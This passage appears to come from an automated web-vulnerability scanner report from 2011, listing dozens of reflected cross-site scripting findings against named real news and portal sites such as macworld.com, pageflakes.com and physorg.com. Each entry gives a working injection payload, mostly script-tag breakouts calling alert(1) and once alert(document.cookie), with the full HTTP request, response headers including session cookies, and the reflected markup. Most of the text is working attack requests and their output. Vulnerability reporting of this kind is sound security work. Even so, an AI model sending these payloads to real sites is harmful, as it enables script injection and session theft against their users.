GET /tag/hoteldeals/?9977d"><script>alert(1)</script>da0051c4140=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload ba515</script><script>alert(1)</script>9be3a85ecb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/157640/2011ba515</script><script>alert(1)</script>9be3a85ecb5/02/iwow_3d.html HTTP/1.1 Host: www.macworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 06 Feb 2011 20:01:44 GMT Cache-Control: max-age=60 Set-Cookie: JSESSIONID=B4274AE30D37266FC181901226A89160; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 06 Feb 2011 20:01:43 GMT Connection: close Cache-Control: no-store, no-cache Cache-Control: post-check=0, pre-check=0, false Pragma: cache differently Vary: Accept-Encoding
The value of REST URL parameter 4 is copied into a JavaScript rest-of-line comment. The payload 34dca</script><script>alert(1)</script>77e3f5cd40e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/157640/2011/0234dca</script><script>alert(1)</script>77e3f5cd40e/iwow_3d.html HTTP/1.1 Host: www.macworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 06 Feb 2011 20:01:48 GMT Cache-Control: max-age=60 Set-Cookie: JSESSIONID=4F189BF818F61F951CACE024006183FD; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 06 Feb 2011 20:01:48 GMT Connection: close Cache-Control: no-store, no-cache Cache-Control: post-check=0, pre-check=0, false Pragma: cache differently Vary: Accept-Encoding
The value of REST URL parameter 5 is copied into a JavaScript rest-of-line comment. The payload b6373</script><script>alert(1)</script>83b2a3ae774 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/157640/2011/02/iwow_3d.htmlb6373</script><script>alert(1)</script>83b2a3ae774 HTTP/1.1 Host: www.macworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/* Namespace RememberURI */ var RememberURI = new Object(); //RememberURI.referer = '/article/157640/2011/02/iwow_3d.htmlb6373</script><script>alert(1)</script>83b2a3ae774'; RememberURI.referer = ''; if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) { RememberURI.query = ''; RememberURI.referer += RememberURI.query; document. ...[SNIP]...
1.601. http://www.mapquesthelp.com/app/answers/detail/a_id/949/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mapquesthelp.com
Path:
/app/answers/detail/a_id/949/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ce58</script><script>alert(1)</script>3ed392e1c04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/answers/detail/a_id/949/?1ce58</script><script>alert(1)</script>3ed392e1c04=1 HTTP/1.1 Host: www.mapquesthelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:40 GMT Server: Apache P3P: policyref="http://www.mapquesthelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUWl6ve2SwZIzixZlF8DwQl5wAtQcAkzpnpZuRG19Yd2kziJLr120Xfjd%7E3XrLO3ljCMJpP8AHJaHQ9EPr73F3kYC1LqfVkcEj3mtpTOw_hsYH4sw0uxS05oYlYSFqV2R1BdQURGerG2hBA07%7ElvFdWzl_HZHP6lriUS28lvFmYITxse0jyKV4yExcvLp1C1Cj3bV%7Ex1pQv0sKHozyL0dGjOkK_Jo44pF4Iap3vCJuf9IFHnwdmSGd7j6f7HcuFEOiyJHwKoYNZVzYNKNT0OiuRhyy0OLVBLgpTWC9bg2IGbtVgHGuh%7EiC%7E%7E9yvxnDyZVGp7D8upACwOg%21; path=/; httponly Content-Length: 38367 RNT-Time: D=123910 t=1297022500002628 RNT-Machine: 09 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
The value of the id request parameter is copied into an HTML comment. The payload 48181--><script>alert(1)</script>c11697f1d6d was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/article.jsp?siteSection=3&id=1358448181--><script>alert(1)</script>c11697f1d6d&pageNum=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:40 GMT Server: Apache Set-Cookie: JSESSIONID=B2A3C39806EA39C152C603DEA0EC83C6.transportation-app1; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 33094
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cf5"><script>alert(1)</script>38dc6ef8109 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /online/article.jsp?siteSection=3&id=1358432cf5"><script>alert(1)</script>38dc6ef8109&pageNum=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:39 GMT Server: Apache Set-Cookie: JSESSIONID=221E9E2F37F1C69B9C1B514DC0D5A781.transportation-app2; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 33087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.604. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.masstransitmag.com
Path:
/online/article.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfd6b"><script>alert(1)</script>821e7ca1b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /online/article.jsp?dfd6b"><script>alert(1)</script>821e7ca1b2a=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:32 GMT Server: Apache Set-Cookie: JSESSIONID=81465FFF8B03042263701984466159E1.transportation-app1; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 32850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.605. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.masstransitmag.com
Path:
/online/article.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 68ff2--><script>alert(1)</script>738b17f48c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/article.jsp?68ff2--><script>alert(1)</script>738b17f48c8=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:33 GMT Server: Apache Set-Cookie: JSESSIONID=F1E985808F858E067A374427EFB5F498.transportation-app2; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 32854
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/ ...[SNIP]... <a href='http://twitter.com/share' rel='nofollow' class='twitter-share-button' expr:data-url='www.masstransitmag.com/online/article.jsp?68ff2--><script>alert(1)</script>738b17f48c8=1' expr:data-text='data:post.title' data-related='bloggerplugins:Tutorials and Widgets for Blogger' data-count='vertical' data-via='' data-lang='en'> ...[SNIP]...
The value of the siteSection request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f13b"><script>alert(1)</script>e5ddb9461e8 was submitted in the siteSection parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /online/article.jsp?siteSection=35f13b"><script>alert(1)</script>e5ddb9461e8&id=13584&pageNum=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:37 GMT Server: Apache Set-Cookie: JSESSIONID=156E7AA6F7BDF72684787B35490E2E05.transportation-app1; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 35169
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the siteSection request parameter is copied into an HTML comment. The payload 44e9e--><script>alert(1)</script>e99cacb7368 was submitted in the siteSection parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/article.jsp?siteSection=344e9e--><script>alert(1)</script>e99cacb7368&id=13584&pageNum=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:38 GMT Server: Apache Set-Cookie: JSESSIONID=632651F33C0F0C26E4A8060DEB153B2C.transportation-app2; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 35170
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/ ...[SNIP]... <a href='http://twitter.com/share' rel='nofollow' class='twitter-share-button' expr:data-url='www.masstransitmag.com/online/article.jsp?siteSection=344e9e--><script>alert(1)</script>e99cacb7368&id=13584&pageNum=1' expr:data-text='data:post.title' data-related='bloggerplugins:Tutorials and Widgets for Blogger' data-count='vertical' data-via='' data-lang='en'> ...[SNIP]...
The value of the 9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecd31"><script>alert(1)</script>6d456b2243d was submitted in the 9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1ecd31"><script>alert(1)</script>6d456b2243d HTTP/1.1 Host: www.mydaily.com Proxy-Connection: keep-alive Referer: http://www.mydaily.com/?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="Geck ...[SNIP]... <link rel="canonical" href="http://www.mydaily.com/?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1ecd31"><script>alert(1)</script>6d456b2243d" /> ...[SNIP]...
1.609. http://www.mydaily.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mydaily.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ae29"><script>alert(1)</script>b6018bd2558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9ae29"><script>alert(1)</script>b6018bd2558=1 HTTP/1.1 Host: www.mydaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75db3"><script>alert(1)</script>f24860aff9d was submitted in the a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=mydaily-ajax75db3"><script>alert(1)</script>f24860aff9d&xmlurl=http://www.mydaily.com/dl-news/rss.xml&tab_text=NEWS%20&%20CULTURE&clickcount=1 HTTP/1.1 Host: www.mydaily.com Proxy-Connection: keep-alive Referer: http://www.mydaily.com/?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1 X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c53c'%3b49c0897d1ab was submitted in the REST URL parameter 1. This input was echoed as 7c53c';49c0897d1ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscribe.aspx7c53c'%3b49c0897d1ab?url=__FEED__ HTTP/1.1 Host: www.pageflakes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:18:24 GMT Server: Microsoft-IIS/6.0 From: web11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: t=; path=/ Set-Cookie: .PAGEFLAKESANON=9B7547FB6F6417F6762368576A206BF25BDED6CB1C6AC19E60765DC0CBB0D504271B8944C0BA37F298127BA102CADE9C72DCFA522B9B6F5D1DE9EC214FFB7E2551D4FD37E98101F05FEAA60C92CF07FC5BFCD9402674BF877CD8044EAEBFF097CEAD8C9FFC6CE64BAC21BD7C010A80BD85BED3DB3C954B41AEAFF5D26F4D3183981B1D4437FEF6ED28DF55DA85BB1D7E4BCA1852CDF3D6E6A1186675A6F328E8; path=/ Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 14411
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9594'-alert(1)-'7d27a31fdb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscribe.aspxb9594'-alert(1)-'7d27a31fdb6 HTTP/1.1 Host: www.pageflakes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:18:25 GMT Server: Microsoft-IIS/6.0 From: web11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: t=; path=/ Set-Cookie: .PAGEFLAKESANON=00C1BACD34145A228C17801CF4E16FBF091C9421789B7ED48B47641BB722DF4B7892848E4981C0856CC10E256EF874A54B3587C0B3881312F4E08965BB83F0A785FD5C2B7B21DEE778AF2BCBC2454BE4667DF4911188191A03F059A9C84B00F7CBD8EAB494795CF0FAB22D303E823190E6952BA20FFA4FC59EA166F4794938214D9BE286A4A65F7A469C920331B7B6A89D4ECD434451E32F7362F3E1422D7C5E; path=/ Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 14376
1.613. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pageflakes.com
Path:
/subscribe.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af7d9</script><script>alert(1)</script>e03da02d0a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscribe.aspx?af7d9</script><script>alert(1)</script>e03da02d0a5=1 HTTP/1.1 Host: www.pageflakes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27fe0</script><script>alert(1)</script>69d8ec74b9a was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscribe.aspx?url=__FEED__27fe0</script><script>alert(1)</script>69d8ec74b9a HTTP/1.1 Host: www.pageflakes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:18:20 GMT Server: Microsoft-IIS/6.0 From: web11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: t=; path=/ Set-Cookie: .PAGEFLAKESANON=2D8C51FE87E25F2EF1C918D6B63CF9D675325614864C923CFB0E64D67A490255F05F2E5BC450692E60090ACE864409D6F5D06BA5DF0B4F6AD1035BD58179A1AE3D0EDB690C98CF3E006C3AA14AD9050C8930C8094CB6D9177C5AB3B04C5B694965FBBC8F6F4A2D9EDC697CDC6F007D8F2FD75E4A7EBC6C9501723C5BE169C7847BCF7E0506253843B4E47F2AAB4861E75504AC1ADC133DB605D262C54574D59E; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Add feed ...[SNIP]... errer; } else { //I clicked the "add to pageflakes link". Please add this feed in my pageflakes page var redirectUrl = 'subscribe2.aspx?url=__FEED__27fe0</script><script>alert(1)</script>69d8ec74b9a'; document.location.href="#marker"; document.location.href= redirectUrl; } </script> ...[SNIP]...
1.615. http://www.parentdish.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.parentdish.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3bee"><script>alert(1)</script>92fa7b5cfb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?b3bee"><script>alert(1)</script>92fa7b5cfb0=1 HTTP/1.1 Host: www.parentdish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.parentdish.com/?b3bee"><script>alert(1)</script>92fa7b5cfb0=1" /> ...[SNIP]...
1.616. http://www.pawnation.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pawnation.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9b1c"><script>alert(1)</script>496daf65c5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e9b1c"><script>alert(1)</script>496daf65c5b=1 HTTP/1.1 Host: www.pawnation.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload ab9ad--><script>alert(1)</script>504317df6ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /newsab9ad--><script>alert(1)</script>504317df6ad/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 20:01:40 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>404 Error ...[SNIP]... </strong>link: /newsab9ad--><script>alert(1)</script>504317df6ad/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html from </p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe04"><script>alert(1)</script>b1c8bc9f93a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news8fe04"><script>alert(1)</script>b1c8bc9f93a/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 20:01:39 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 965c3"-alert(1)-"7fd2404c518 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news965c3"-alert(1)-"7fd2404c518/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 20:01:40 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
1.620. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.politicsdaily.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb646"-alert(1)-"c970a7d0009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cb646"-alert(1)-"c970a7d0009=1 HTTP/1.1 Host: www.politicsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.621. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.politicsdaily.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b75"><script>alert(1)</script>4f92425601e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?12b75"><script>alert(1)</script>4f92425601e=1 HTTP/1.1 Host: www.politicsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Politics News, Elec ...[SNIP]... <link rel="canonical" href="http://www.politicsdaily.com/?12b75"><script>alert(1)</script>4f92425601e=1"/> ...[SNIP]...
1.622. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.popeater.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6b4"-alert(1)-"7668b18d7c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8e6b4"-alert(1)-"7668b18d7c7=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.623. http://www.shelterpop.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shelterpop.com
Path:
/
Issue detail
